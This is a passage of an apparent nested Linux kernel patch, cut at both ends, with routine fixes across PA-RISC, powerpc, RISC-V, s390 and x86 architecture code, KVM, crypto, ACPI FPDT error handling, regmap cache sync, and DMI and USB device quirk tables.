+ 	unsigned long pot_key;
+ 	unsigned long curr_key;
++	unsigned long width;	/* default of PSW_W bit (1=enabled) */
+ };
+ 
+ struct pdc_cache_cf {		/* for PDC_CACHE  (I/D-caches) */
+diff --git a/arch/parisc/kernel/entry.S b/arch/parisc/kernel/entry.S
+index 0e5ebfe8d9d29..335887673c656 100644
+--- a/arch/parisc/kernel/entry.S
++++ b/arch/parisc/kernel/entry.S
+@@ -462,13 +462,13 @@
+ 	 * to a CPU TLB 4k PFN (4k => 12 bits to shift) */
+ 	#define PAGE_ADD_SHIFT		(PAGE_SHIFT-12)
+ 	#define PAGE_ADD_HUGE_SHIFT	(REAL_HPAGE_SHIFT-12)
++	#define PFN_START_BIT	(63-ASM_PFN_PTE_SHIFT+(63-58)-PAGE_ADD_SHIFT)
+ 
+ 	/* Drop prot bits and convert to page addr for iitlbt and idtlbt */
+ 	.macro		convert_for_tlb_insert20 pte,tmp
+ #ifdef CONFIG_HUGETLB_PAGE
+ 	copy		\pte,\tmp
+-	extrd,u		\tmp,(63-ASM_PFN_PTE_SHIFT)+(63-58)+PAGE_ADD_SHIFT,\
+-				64-PAGE_SHIFT-PAGE_ADD_SHIFT,\pte
++	extrd,u		\tmp,PFN_START_BIT,PFN_START_BIT+1,\pte
+ 
+ 	depdi		_PAGE_SIZE_ENCODING_DEFAULT,63,\
+ 				(63-58)+PAGE_ADD_SHIFT,\pte
+@@ -476,8 +476,7 @@
+ 	depdi		_HUGE_PAGE_SIZE_ENCODING_DEFAULT,63,\
+ 				(63-58)+PAGE_ADD_HUGE_SHIFT,\pte
+ #else /* Huge pages disabled */
+-	extrd,u		\pte,(63-ASM_PFN_PTE_SHIFT)+(63-58)+PAGE_ADD_SHIFT,\
+-				64-PAGE_SHIFT-PAGE_ADD_SHIFT,\pte
++	extrd,u		\pte,PFN_START_BIT,PFN_START_BIT+1,\pte
+ 	depdi		_PAGE_SIZE_ENCODING_DEFAULT,63,\
+ 				(63-58)+PAGE_ADD_SHIFT,\pte
+ #endif
+diff --git a/arch/parisc/kernel/head.S b/arch/parisc/kernel/head.S
+index fd15fd4bbb61b..5a7d43c0f469c 100644
+--- a/arch/parisc/kernel/head.S
++++ b/arch/parisc/kernel/head.S
+@@ -70,9 +70,8 @@ $bss_loop:
+ 	stw,ma          %arg2,4(%r1)
+ 	stw,ma          %arg3,4(%r1)
+ 
+-#if !defined(CONFIG_64BIT) && defined(CONFIG_PA20)
+-	/* This 32-bit kernel was compiled for PA2.0 CPUs. Check current CPU
+-	 * and halt kernel if we detect a PA1.x CPU. */
++#if defined(CONFIG_PA20)
++	/* check for 64-bit capable CPU as required by current kernel */
+ 	ldi		32,%r10
+ 	mtctl		%r10,%cr11
+ 	.level 2.0
+diff --git a/arch/powerpc/perf/core-book3s.c b/arch/powerpc/perf/core-book3s.c
+index 942aa830e110e..e3c31c771ce91 100644
+--- a/arch/powerpc/perf/core-book3s.c
++++ b/arch/powerpc/perf/core-book3s.c
+@@ -1371,8 +1371,7 @@ static void power_pmu_disable(struct pmu *pmu)
+ 		/*
+ 		 * Disable instruction sampling if it was enabled
+ 		 */
+-		if (cpuhw->mmcr.mmcra & MMCRA_SAMPLE_ENABLE)
+-			val &= ~MMCRA_SAMPLE_ENABLE;
++		val &= ~MMCRA_SAMPLE_ENABLE;
+ 
+ 		/* Disable BHRB via mmcra (BHRBRD) for p10 */
+ 		if (ppmu->flags & PPMU_ARCH_31)
+@@ -1383,7 +1382,7 @@ static void power_pmu_disable(struct pmu *pmu)
+ 		 * instruction sampling or BHRB.
+ 		 */
+ 		if (val != mmcra) {
+-			mtspr(SPRN_MMCRA, mmcra);
++			mtspr(SPRN_MMCRA, val);
+ 			mb();
+ 			isync();
+ 		}
+diff --git a/arch/powerpc/platforms/powernv/opal-prd.c b/arch/powerpc/platforms/powernv/opal-prd.c
+index 113bdb151f687..40e26e9f318fd 100644
+--- a/arch/powerpc/platforms/powernv/opal-prd.c
++++ b/arch/powerpc/platforms/powernv/opal-prd.c
+@@ -24,13 +24,20 @@
+ #include <linux/uaccess.h>
+ 
+ 
++struct opal_prd_msg {
++	union {
++		struct opal_prd_msg_header header;
++		DECLARE_FLEX_ARRAY(u8, data);
++	};
++};
++
+ /*
+  * The msg member must be at the end of the struct, as it's followed by the
+  * message data.
+  */
+ struct opal_prd_msg_queue_item {
+-	struct list_head		list;
+-	struct opal_prd_msg_header	msg;
++	struct list_head	list;
++	struct opal_prd_msg	msg;
+ };
+ 
+ static struct device_node *prd_node;
+@@ -156,7 +163,7 @@ static ssize_t opal_prd_read(struct file *file, char __user *buf,
+ 	int rc;
+ 
+ 	/* we need at least a header's worth of data */
+-	if (count < sizeof(item->msg))
++	if (count < sizeof(item->msg.header))
+ 		return -EINVAL;
+ 
+ 	if (*ppos)
+@@ -186,7 +193,7 @@ static ssize_t opal_prd_read(struct file *file, char __user *buf,
+ 			return -EINTR;
+ 	}
+ 
+-	size = be16_to_cpu(item->msg.size);
++	size = be16_to_cpu(item->msg.header.size);
+ 	if (size > count) {
+ 		err = -EINVAL;
+ 		goto err_requeue;
+@@ -352,7 +359,7 @@ static int opal_prd_msg_notifier(struct notifier_block *nb,
+ 	if (!item)
+ 		return -ENOMEM;
+ 
+-	memcpy(&item->msg, msg->params, msg_size);
++	memcpy(&item->msg.data, msg->params, msg_size);
+ 
+ 	spin_lock_irqsave(&opal_prd_msg_queue_lock, flags);
+ 	list_add_tail(&item->list, &opal_prd_msg_queue);
+diff --git a/arch/riscv/include/asm/page.h b/arch/riscv/include/asm/page.h
+index ac70b0fd9a9a3..86048c60f7002 100644
+--- a/arch/riscv/include/asm/page.h
++++ b/arch/riscv/include/asm/page.h
+@@ -38,8 +38,8 @@
+ #define PAGE_OFFSET		_AC(CONFIG_PAGE_OFFSET, UL)
+ #endif
+ /*
+- * By default, CONFIG_PAGE_OFFSET value corresponds to SV48 address space so
+- * define the PAGE_OFFSET value for SV39.
++ * By default, CONFIG_PAGE_OFFSET value corresponds to SV57 address space so
++ * define the PAGE_OFFSET value for SV48 and SV39.
+  */
+ #define PAGE_OFFSET_L4		_AC(0xffffaf8000000000, UL)
+ #define PAGE_OFFSET_L3		_AC(0xffffffd800000000, UL)
+diff --git a/arch/riscv/kernel/probes/simulate-insn.c b/arch/riscv/kernel/probes/simulate-insn.c
+index a20568bd1f1a8..41bf1eb0110dd 100644
+--- a/arch/riscv/kernel/probes/simulate-insn.c
++++ b/arch/riscv/kernel/probes/simulate-insn.c
+@@ -24,7 +24,7 @@ static inline bool rv_insn_reg_set_val(struct pt_regs *regs, u32 index,
+ 				       unsigned long val)
+ {
+ 	if (index == 0)
+-		return false;
++		return true;
+ 	else if (index <= 31)
+ 		*((unsigned long *)regs + index) = val;
+ 	else
+diff --git a/arch/riscv/kernel/smp.c b/arch/riscv/kernel/smp.c
+index 8c3b59f1f9b80..7f534023f4ffe 100644
+--- a/arch/riscv/kernel/smp.c
++++ b/arch/riscv/kernel/smp.c
+@@ -58,7 +58,6 @@ int riscv_hartid_to_cpuid(unsigned long hartid)
+ 		if (cpuid_to_hartid_map(i) == hartid)
+ 			return i;
+ 
+-	pr_err("Couldn't find cpu id for hartid [%lu]\n", hartid);
+ 	return -ENOENT;
+ }
+ 
+diff --git a/arch/riscv/mm/ptdump.c b/arch/riscv/mm/ptdump.c
+index 20a9f991a6d74..e9090b38f8117 100644
+--- a/arch/riscv/mm/ptdump.c
++++ b/arch/riscv/mm/ptdump.c
+@@ -384,6 +384,9 @@ static int __init ptdump_init(void)
+ 
+ 	kernel_ptd_info.base_addr = KERN_VIRT_START;
+ 
++	pg_level[1].name = pgtable_l5_enabled ? "P4D" : "PGD";
++	pg_level[2].name = pgtable_l4_enabled ? "PUD" : "PGD";
++
+ 	for (i = 0; i < ARRAY_SIZE(pg_level); i++)
+ 		for (j = 0; j < ARRAY_SIZE(pte_bits); j++)
+ 			pg_level[i].mask |= pte_bits[j].mask;
+diff --git a/arch/s390/mm/page-states.c b/arch/s390/mm/page-states.c
+index d5ea09d78938b..7bea3be8b8280 100644
+--- a/arch/s390/mm/page-states.c
++++ b/arch/s390/mm/page-states.c
+@@ -132,7 +132,7 @@ static void mark_kernel_pud(p4d_t *p4d, unsigned long addr, unsigned long end)
+ 			continue;
+ 		if (!pud_folded(*pud)) {
+ 			page = phys_to_page(pud_val(*pud));
+-			for (i = 0; i < 3; i++)
++			for (i = 0; i < 4; i++)
+ 				set_bit(PG_arch_1, &page[i].flags);
+ 		}
+ 		mark_kernel_pmd(pud, addr, next);
+@@ -153,7 +153,7 @@ static void mark_kernel_p4d(pgd_t *pgd, unsigned long addr, unsigned long end)
+ 			continue;
+ 		if (!p4d_folded(*p4d)) {
+ 			page = phys_to_page(p4d_val(*p4d));
+-			for (i = 0; i < 3; i++)
++			for (i = 0; i < 4; i++)
+ 				set_bit(PG_arch_1, &page[i].flags);
+ 		}
+ 		mark_kernel_pud(p4d, addr, next);
+@@ -175,7 +175,7 @@ static void mark_kernel_pgd(void)
+ 			continue;
+ 		if (!pgd_folded(*pgd)) {
+ 			page = phys_to_page(pgd_val(*pgd));
+-			for (i = 0; i < 3; i++)
++			for (i = 0; i < 4; i++)
+ 				set_bit(PG_arch_1, &page[i].flags);
+ 		}
+ 		mark_kernel_p4d(pgd, addr, next);
+diff --git a/arch/x86/crypto/sha1_ssse3_glue.c b/arch/x86/crypto/sha1_ssse3_glue.c
+index 44340a1139e0b..959afa705e95c 100644
+--- a/arch/x86/crypto/sha1_ssse3_glue.c
++++ b/arch/x86/crypto/sha1_ssse3_glue.c
+@@ -24,8 +24,17 @@
+ #include <linux/types.h>
+ #include <crypto/sha1.h>
+ #include <crypto/sha1_base.h>
++#include <asm/cpu_device_id.h>
+ #include <asm/simd.h>
+ 
++static const struct x86_cpu_id module_cpu_ids[] = {
++	X86_MATCH_FEATURE(X86_FEATURE_AVX2, NULL),
++	X86_MATCH_FEATURE(X86_FEATURE_AVX, NULL),
++	X86_MATCH_FEATURE(X86_FEATURE_SSSE3, NULL),
++	{}
++};
++MODULE_DEVICE_TABLE(x86cpu, module_cpu_ids);
++
+ static int sha1_update(struct shash_desc *desc, const u8 *data,
+ 			     unsigned int len, sha1_block_fn *sha1_xform)
+ {
+@@ -301,6 +310,9 @@ static inline void unregister_sha1_ni(void) { }
+ 
+ static int __init sha1_ssse3_mod_init(void)
+ {
++	if (!x86_match_cpu(module_cpu_ids))
++		return -ENODEV;
++
+ 	if (register_sha1_ssse3())
+ 		goto fail;
+ 
+diff --git a/arch/x86/crypto/sha256_ssse3_glue.c b/arch/x86/crypto/sha256_ssse3_glue.c
+index 3a5f6be7dbba4..d25235f0ccafc 100644
+--- a/arch/x86/crypto/sha256_ssse3_glue.c
++++ b/arch/x86/crypto/sha256_ssse3_glue.c
+@@ -38,11 +38,20 @@
+ #include <crypto/sha2.h>
+ #include <crypto/sha256_base.h>
+ #include <linux/string.h>
++#include <asm/cpu_device_id.h>
+ #include <asm/simd.h>
+ 
+ asmlinkage void sha256_transform_ssse3(struct sha256_state *state,
+ 				       const u8 *data, int blocks);
+ 
++static const struct x86_cpu_id module_cpu_ids[] = {
++	X86_MATCH_FEATURE(X86_FEATURE_AVX2, NULL),
++	X86_MATCH_FEATURE(X86_FEATURE_AVX, NULL),
++	X86_MATCH_FEATURE(X86_FEATURE_SSSE3, NULL),
++	{}
++};
++MODULE_DEVICE_TABLE(x86cpu, module_cpu_ids);
++
+ static int _sha256_update(struct shash_desc *desc, const u8 *data,
+ 			  unsigned int len, sha256_block_fn *sha256_xform)
+ {
+@@ -366,6 +375,9 @@ static inline void unregister_sha256_ni(void) { }
+ 
+ static int __init sha256_ssse3_mod_init(void)
+ {
++	if (!x86_match_cpu(module_cpu_ids))
++		return -ENODEV;
++
+ 	if (register_sha256_ssse3())
+ 		goto fail;
+ 
+diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
+index 016fb500b3a6f..ec955ab2ff034 100644
+--- a/arch/x86/include/asm/msr-index.h
++++ b/arch/x86/include/asm/msr-index.h
+@@ -551,6 +551,7 @@
+ #define MSR_AMD64_CPUID_FN_1		0xc0011004
+ #define MSR_AMD64_LS_CFG		0xc0011020
+ #define MSR_AMD64_DC_CFG		0xc0011022
++#define MSR_AMD64_TW_CFG		0xc0011023
+ 
+ #define MSR_AMD64_DE_CFG		0xc0011029
+ #define MSR_AMD64_DE_CFG_LFENCE_SERIALIZE_BIT	 1
+diff --git a/arch/x86/include/asm/numa.h b/arch/x86/include/asm/numa.h
+index e3bae2b60a0db..ef2844d691735 100644
+--- a/arch/x86/include/asm/numa.h
++++ b/arch/x86/include/asm/numa.h
+@@ -12,13 +12,6 @@
+ 
+ #define NR_NODE_MEMBLKS		(MAX_NUMNODES*2)
+ 
+-/*
+- * Too small node sizes may confuse the VM badly. Usually they
+- * result from BIOS bugs. So dont recognize nodes as standalone
+- * NUMA entities that have less than this amount of RAM listed:
+- */
+-#define NODE_MIN_SIZE (4*1024*1024)
+-
+ extern int numa_off;
+ 
+ /*
+diff --git a/arch/x86/kernel/cpu/hygon.c b/arch/x86/kernel/cpu/hygon.c
+index c393b8773ace6..9e8380bd4fb9f 100644
+--- a/arch/x86/kernel/cpu/hygon.c
++++ b/arch/x86/kernel/cpu/hygon.c
+@@ -86,8 +86,12 @@ static void hygon_get_topology(struct cpuinfo_x86 *c)
+ 		if (!err)
+ 			c->x86_coreid_bits = get_count_order(c->x86_max_cores);
+ 
+-		/* Socket ID is ApicId[6] for these processors. */
+-		c->phys_proc_id = c->apicid >> APICID_SOCKET_ID_BIT;
++		/*
++		 * Socket ID is ApicId[6] for the processors with model <= 0x3
++		 * when running on host.
++		 */
++		if (!boot_cpu_has(X86_FEATURE_HYPERVISOR) && c->x86_model <= 0x3)
++			c->phys_proc_id = c->apicid >> APICID_SOCKET_ID_BIT;
+ 
+ 		cacheinfo_hygon_init_llc_id(c, cpu);
+ 	} else if (cpu_has(c, X86_FEATURE_NODEID_MSR)) {
+diff --git a/arch/x86/kvm/hyperv.c b/arch/x86/kvm/hyperv.c
+index 0adf4a437e85f..04cca46fed1e8 100644
+--- a/arch/x86/kvm/hyperv.c
++++ b/arch/x86/kvm/hyperv.c
+@@ -705,10 +705,12 @@ static int stimer_set_count(struct kvm_vcpu_hv_stimer *stimer, u64 count,
+ 
+ 	stimer_cleanup(stimer);
+ 	stimer->count = count;
+-	if (stimer->count == 0)
+-		stimer->config.enable = 0;
+-	else if (stimer->config.auto_enable)
+-		stimer->config.enable = 1;
++	if (!host) {
++		if (stimer->count == 0)
++			stimer->config.enable = 0;
++		else if (stimer->config.auto_enable)
++			stimer->config.enable = 1;
++	}
+ 
+ 	if (stimer->config.enable)
+ 		stimer_mark_pending(stimer, false);
+diff --git a/arch/x86/kvm/lapic.c b/arch/x86/kvm/lapic.c
+index 7e8dbd54869a6..4dba0a84ba2f3 100644
+--- a/arch/x86/kvm/lapic.c
++++ b/arch/x86/kvm/lapic.c
+@@ -2294,22 +2294,22 @@ EXPORT_SYMBOL_GPL(kvm_lapic_set_eoi);
+ void kvm_apic_write_nodecode(struct kvm_vcpu *vcpu, u32 offset)
+ {
+ 	struct kvm_lapic *apic = vcpu->arch.apic;
+-	u64 val;
+ 
+ 	/*
+-	 * ICR is a single 64-bit register when x2APIC is enabled.  For legacy
+-	 * xAPIC, ICR writes need to go down the common (slightly slower) path
+-	 * to get the upper half from ICR2.
++	 * ICR is a single 64-bit register when x2APIC is enabled, all others
++	 * registers hold 32-bit values.  For legacy xAPIC, ICR writes need to
++	 * go down the common path to get the upper half from ICR2.
++	 *
++	 * Note, using the write helpers may incur an unnecessary write to the
++	 * virtual APIC state, but KVM needs to conditionally modify the value
++	 * in certain cases, e.g. to clear the ICR busy bit.  The cost of extra
++	 * conditional branches is likely a wash relative to the cost of the
++	 * maybe-unecessary write, and both are in the noise anyways.
+ 	 */
+-	if (apic_x2apic_mode(apic) && offset == APIC_ICR) {
+-		val = kvm_lapic_get_reg64(apic, APIC_ICR);
+-		kvm_apic_send_ipi(apic, (u32)val, (u32)(val >> 32));
+-		trace_kvm_apic_write(APIC_ICR, val);
+-	} else {
+-		/* TODO: optimize to just emulate side effect w/o one more write */
+-		val = kvm_lapic_get_reg(apic, offset);
+-		kvm_lapic_reg_write(apic, offset, (u32)val);
+-	}
++	if (apic_x2apic_mode(apic) && offset == APIC_ICR)
++		kvm_x2apic_icr_write(apic, kvm_lapic_get_reg64(apic, APIC_ICR));
++	else
++		kvm_lapic_reg_write(apic, offset, kvm_lapic_get_reg(apic, offset));
+ }
+ EXPORT_SYMBOL_GPL(kvm_apic_write_nodecode);
+ 
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 4d6baae1ae748..7144e51668136 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -3582,6 +3582,7 @@ int kvm_set_msr_common(struct kvm_vcpu *vcpu, struct msr_data *msr_info)
+ 	case MSR_AMD64_PATCH_LOADER:
+ 	case MSR_AMD64_BU_CFG2:
+ 	case MSR_AMD64_DC_CFG:
++	case MSR_AMD64_TW_CFG:
+ 	case MSR_F15H_EX_CFG:
+ 		break;
+ 
+@@ -3982,6 +3983,7 @@ int kvm_get_msr_common(struct kvm_vcpu *vcpu, struct msr_data *msr_info)
+ 	case MSR_AMD64_BU_CFG2:
+ 	case MSR_IA32_PERF_CTL:
+ 	case MSR_AMD64_DC_CFG:
++	case MSR_AMD64_TW_CFG:
+ 	case MSR_F15H_EX_CFG:
+ 	/*
+ 	 * Intel Sandy Bridge CPUs must support the RAPL (running average power
+diff --git a/arch/x86/mm/numa.c b/arch/x86/mm/numa.c
+index c01c5506fd4ae..aa39d678fe81d 100644
+--- a/arch/x86/mm/numa.c
++++ b/arch/x86/mm/numa.c
+@@ -602,13 +602,6 @@ static int __init numa_register_memblks(struct numa_meminfo *mi)
+ 		if (start >= end)
+ 			continue;
+ 
+-		/*
+-		 * Don't confuse VM with a node that doesn't have the
+-		 * minimum amount of memory:
+-		 */
+-		if (end && (end - start) < NODE_MIN_SIZE)
+-			continue;
+-
+ 		alloc_node_data(nid);
+ 	}
+ 
+diff --git a/crypto/pcrypt.c b/crypto/pcrypt.c
+index 9d10b846ccf73..005a36cb21bc4 100644
+--- a/crypto/pcrypt.c
++++ b/crypto/pcrypt.c
+@@ -117,6 +117,8 @@ static int pcrypt_aead_encrypt(struct aead_request *req)
+ 	err = padata_do_parallel(ictx->psenc, padata, &ctx->cb_cpu);
+ 	if (!err)
+ 		return -EINPROGRESS;
++	if (err == -EBUSY)
++		return -EAGAIN;
+ 
+ 	return err;
+ }
+@@ -164,6 +166,8 @@ static int pcrypt_aead_decrypt(struct aead_request *req)
+ 	err = padata_do_parallel(ictx->psdec, padata, &ctx->cb_cpu);
+ 	if (!err)
+ 		return -EINPROGRESS;
++	if (err == -EBUSY)
++		return -EAGAIN;
+ 
+ 	return err;
+ }
+diff --git a/drivers/acpi/acpi_fpdt.c b/drivers/acpi/acpi_fpdt.c
+index a2056c4c8cb70..271092f2700a1 100644
+--- a/drivers/acpi/acpi_fpdt.c
++++ b/drivers/acpi/acpi_fpdt.c
+@@ -194,12 +194,19 @@ static int fpdt_process_subtable(u64 address, u32 subtable_type)
+ 		record_header = (void *)subtable_header + offset;
+ 		offset += record_header->length;
+ 
++		if (!record_header->length) {
++			pr_err(FW_BUG "Zero-length record found in FPTD.\n");
++			result = -EINVAL;
++			goto err;
++		}
++
+ 		switch (record_header->type) {
+ 		case RECORD_S3_RESUME:
+ 			if (subtable_type != SUBTABLE_S3PT) {
+ 				pr_err(FW_BUG "Invalid record %d for subtable %s\n",
+ 				     record_header->type, signature);
+-				return -EINVAL;
++				result = -EINVAL;
++				goto err;
+ 			}
+ 			if (record_resume) {
+ 				pr_err("Duplicate resume performance record found.\n");
+@@ -208,7 +215,7 @@ static int fpdt_process_subtable(u64 address, u32 subtable_type)
+ 			record_resume = (struct resume_performance_record *)record_header;
+ 			result = sysfs_create_group(fpdt_kobj, &resume_attr_group);
+ 			if (result)
+-				return result;
++				goto err;
+ 			break;
+ 		case RECORD_S3_SUSPEND:
+ 			if (subtable_type != SUBTABLE_S3PT) {
+@@ -223,13 +230,14 @@ static int fpdt_process_subtable(u64 address, u32 subtable_type)
+ 			record_suspend = (struct suspend_performance_record *)record_header;
+ 			result = sysfs_create_group(fpdt_kobj, &suspend_attr_group);
+ 			if (result)
+-				return result;
++				goto err;
+ 			break;
+ 		case RECORD_BOOT:
+ 			if (subtable_type != SUBTABLE_FBPT) {
+ 				pr_err(FW_BUG "Invalid %d for subtable %s\n",
+ 				     record_header->type, signature);
+-				return -EINVAL;
++				result = -EINVAL;
++				goto err;
+ 			}
+ 			if (record_boot) {
+ 				pr_err("Duplicate boot performance record found.\n");
+@@ -238,7 +246,7 @@ static int fpdt_process_subtable(u64 address, u32 subtable_type)
+ 			record_boot = (struct boot_performance_record *)record_header;
+ 			result = sysfs_create_group(fpdt_kobj, &boot_attr_group);
+ 			if (result)
+-				return result;
++				goto err;
+ 			break;
+ 
+ 		default:
+@@ -247,6 +255,18 @@ static int fpdt_process_subtable(u64 address, u32 subtable_type)
+ 		}
+ 	}
+ 	return 0;
++
++err:
++	if (record_boot)
++		sysfs_remove_group(fpdt_kobj, &boot_attr_group);
++
++	if (record_suspend)
++		sysfs_remove_group(fpdt_kobj, &suspend_attr_group);
++
++	if (record_resume)
++		sysfs_remove_group(fpdt_kobj, &resume_attr_group);
++
++	return result;
+ }
+ 
+ static int __init acpi_init_fpdt(void)
+@@ -255,6 +275,7 @@ static int __init acpi_init_fpdt(void)
+ 	struct acpi_table_header *header;
+ 	struct fpdt_subtable_entry *subtable;
+ 	u32 offset = sizeof(*header);
++	int result;
+ 
+ 	status = acpi_get_table(ACPI_SIG_FPDT, 0, &header);
+ 
+@@ -263,8 +284,8 @@ static int __init acpi_init_fpdt(void)
+ 
+ 	fpdt_kobj = kobject_create_and_add("fpdt", acpi_kobj);
+ 	if (!fpdt_kobj) {
+-		acpi_put_table(header);
+-		return -ENOMEM;
++		result = -ENOMEM;
++		goto err_nomem;
+ 	}
+ 
+ 	while (offset < header->length) {
+@@ -272,8 +293,10 @@ static int __init acpi_init_fpdt(void)
+ 		switch (subtable->type) {
+ 		case SUBTABLE_FBPT:
+ 		case SUBTABLE_S3PT:
+-			fpdt_process_subtable(subtable->address,
++			result = fpdt_process_subtable(subtable->address,
+ 					      subtable->type);
++			if (result)
++				goto err_subtable;
+ 			break;
+ 		default:
+ 			/* Other types are reserved in ACPI 6.4 spec. */
+@@ -282,6 +305,12 @@ static int __init acpi_init_fpdt(void)
+ 		offset += sizeof(*subtable);
+ 	}
+ 	return 0;
++err_subtable:
++	kobject_put(fpdt_kobj);
++
++err_nomem:
++	acpi_put_table(header);
++	return result;
+ }
+ 
+ fs_initcall(acpi_init_fpdt);
+diff --git a/drivers/acpi/ec.c b/drivers/acpi/ec.c
+index 8bb233d2d1e48..77d1f2cb89ef3 100644
+--- a/drivers/acpi/ec.c
++++ b/drivers/acpi/ec.c
+@@ -1897,6 +1897,16 @@ static const struct dmi_system_id ec_dmi_table[] __initconst = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "HP Pavilion Gaming Laptop 15-dk1xxx"),
+ 		},
+ 	},
++	{
++		/*
++		 * HP 250 G7 Notebook PC
++		 */
++		.callback = ec_honor_dsdt_gpe,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "HP"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "HP 250 G7 Notebook PC"),
++		},
++	},
+ 	{
+ 		/*
+ 		 * Samsung hardware
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index af6fa801d1ed8..99bab31919e4c 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -499,6 +499,18 @@ static const struct dmi_system_id maingear_laptop[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "MG-VCP2-15A3070T"),
+ 		}
+ 	},
++	{
++		/* TongFang GMxXGxx/TUXEDO Polaris 15 Gen5 AMD */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "GMxXGxx"),
++		},
++	},
++	{
++		/* TongFang GM6XGxX/TUXEDO Stellaris 16 Gen5 AMD */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "GM6XGxX"),
++		},
++	},
+ 	{
+ 		.ident = "MAINGEAR Vector Pro 2 17",
+ 		.matches = {
+diff --git a/drivers/atm/iphase.c b/drivers/atm/iphase.c
+index 3241486869530..9bba8f280a4d4 100644
+--- a/drivers/atm/iphase.c
++++ b/drivers/atm/iphase.c
+@@ -2291,19 +2291,21 @@ static int get_esi(struct atm_dev *dev)
+ static int reset_sar(struct atm_dev *dev)  
+ {  
+ 	IADEV *iadev;  
+-	int i, error = 1;  
++	int i, error;
+ 	unsigned int pci[64];  
+ 	  
+ 	iadev = INPH_IA_DEV(dev);  
+-	for(i=0; i<64; i++)  
+-	  if ((error = pci_read_config_dword(iadev->pci,  
+-				i*4, &pci[i])) != PCIBIOS_SUCCESSFUL)  
+-  	      return error;  
++	for (i = 0; i < 64; i++) {
++		error = pci_read_config_dword(iadev->pci, i * 4, &pci[i]);
++		if (error != PCIBIOS_SUCCESSFUL)
++			return error;
++	}
+ 	writel(0, iadev->reg+IPHASE5575_EXT_RESET);  
+-	for(i=0; i<64; i++)  
+-	  if ((error = pci_write_config_dword(iadev->pci,  
+-					i*4, pci[i])) != PCIBIOS_SUCCESSFUL)  
+-	    return error;  
++	for (i = 0; i < 64; i++) {
++		error = pci_write_config_dword(iadev->pci, i * 4, pci[i]);
++		if (error != PCIBIOS_SUCCESSFUL)
++			return error;
++	}
+ 	udelay(5);  
+ 	return 0;  
+ }  
+diff --git a/drivers/base/dd.c b/drivers/base/dd.c
+index 380a53b6aee81..dbbe2cebb8917 100644
+--- a/drivers/base/dd.c
++++ b/drivers/base/dd.c
+@@ -1262,8 +1262,8 @@ static void __device_release_driver(struct device *dev, struct device *parent)
+ 		if (dev->bus && dev->bus->dma_cleanup)
+ 			dev->bus->dma_cleanup(dev);
+ 
+-		device_links_driver_cleanup(dev);
+ 		device_unbind_cleanup(dev);
++		device_links_driver_cleanup(dev);
+ 
+ 		klist_remove(&dev->p->knode_driver);
+ 		device_pm_check_callbacks(dev);
+diff --git a/drivers/base/regmap/regcache.c b/drivers/base/regmap/regcache.c
+index 8031007b4887d..cf3fa998093de 100644
+--- a/drivers/base/regmap/regcache.c
++++ b/drivers/base/regmap/regcache.c
+@@ -331,6 +331,11 @@ static int regcache_default_sync(struct regmap *map, unsigned int min,
+ 	return 0;
+ }
+ 
++static int rbtree_all(const void *key, const struct rb_node *node)
++{
++	return 0;
++}
++
+ /**
+  * regcache_sync - Sync the register cache with the hardware.
+  *
+@@ -348,6 +353,7 @@ int regcache_sync(struct regmap *map)
+ 	unsigned int i;
+ 	const char *name;
+ 	bool bypass;
++	struct rb_node *node;
+ 
+ 	if (WARN_ON(map->cache_type == REGCACHE_NONE))
+ 		return -EINVAL;
+@@ -392,6 +398,30 @@ out:
+ 	map->async = false;
+ 	map->cache_bypass = bypass;
+ 	map->no_sync_defaults = false;
++
++	/*
++	 * If we did any paging with cache bypassed and a cached
++	 * paging register then the register and cache state might
++	 * have gone out of sync, force writes of all the paging
++	 * registers.
++	 */
++	rb_for_each(node, 0, &map->range_tree, rbtree_all) {
++		struct regmap_range_node *this =
++			rb_entry(node, struct regmap_range_node, node);
++
++		/* If there's nothing in the cache there's nothing to sync */
++		ret = regcache_read(map, this->selector_reg, &i);
++		if (ret != 0)
++			continue;
++
++		ret = _regmap_write(map, this->selector_reg, i);
++		if (ret != 0) {
++			dev_err(map->dev, "Failed to write %x = %x: %d\n",
++				this->selector_reg, i, ret);
++			break;
++		}
++	}
++
+ 	map->unlock(map->lock_arg);
+ 
+ 	regmap_async_complete(map);
+diff --git a/drivers/block/virtio_blk.c b/drivers/block/virtio_blk.c
+index a7697027ce43b..efa5535a8e1d8 100644
+--- a/drivers/block/virtio_blk.c
++++ b/drivers/block/virtio_blk.c
+@@ -900,6 +900,7 @@ static int virtblk_probe(struct virtio_device *vdev)
+ 	u16 min_io_size;
+ 	u8 physical_block_exp, alignment_offset;
+ 	unsigned int queue_depth;
++	size_t max_dma_size;
+ 
+ 	if (!vdev->config->get) {
+ 		dev_err(&vdev->dev, "%s failure: config access disabled\n",
+@@ -998,7 +999,8 @@ static int virtblk_probe(struct virtio_device *vdev)
+ 	/* No real sector limit. */
+ 	blk_queue_max_hw_sectors(q, -1U);
+ 
+-	max_size = virtio_max_dma_size(vdev);
++	max_dma_size = virtio_max_dma_size(vdev);
++	max_size = max_dma_size > U32_MAX ? U32_MAX : max_dma_size;
+ 
+ 	/* Host can optionally specify maximum segment size and number of
+ 	 * segments. */
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index 96d4f48e36011..954f7f3b5cc30 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -532,6 +532,18 @@ static const struct usb_device_id blacklist_table[] = {
+ 	{ USB_DEVICE(0x13d3, 0x3592), .driver_info = BTUSB_REALTEK |
+ 						     BTUSB_WIDEBAND_SPEECH },
+ 
++	/* Realtek 8852BE Bluetooth devices */
++	{ USB_DEVICE(0x0cb8, 0xc559), .driver_info = BTUSB_REALTEK |
++						     BTUSB_WIDEBAND_SPEECH },
++	{ USB_DEVICE(0x0bda, 0x887b), .driver_info = BTUSB_REALTEK |
++						     BTUSB_WIDEBAND_SPEECH },
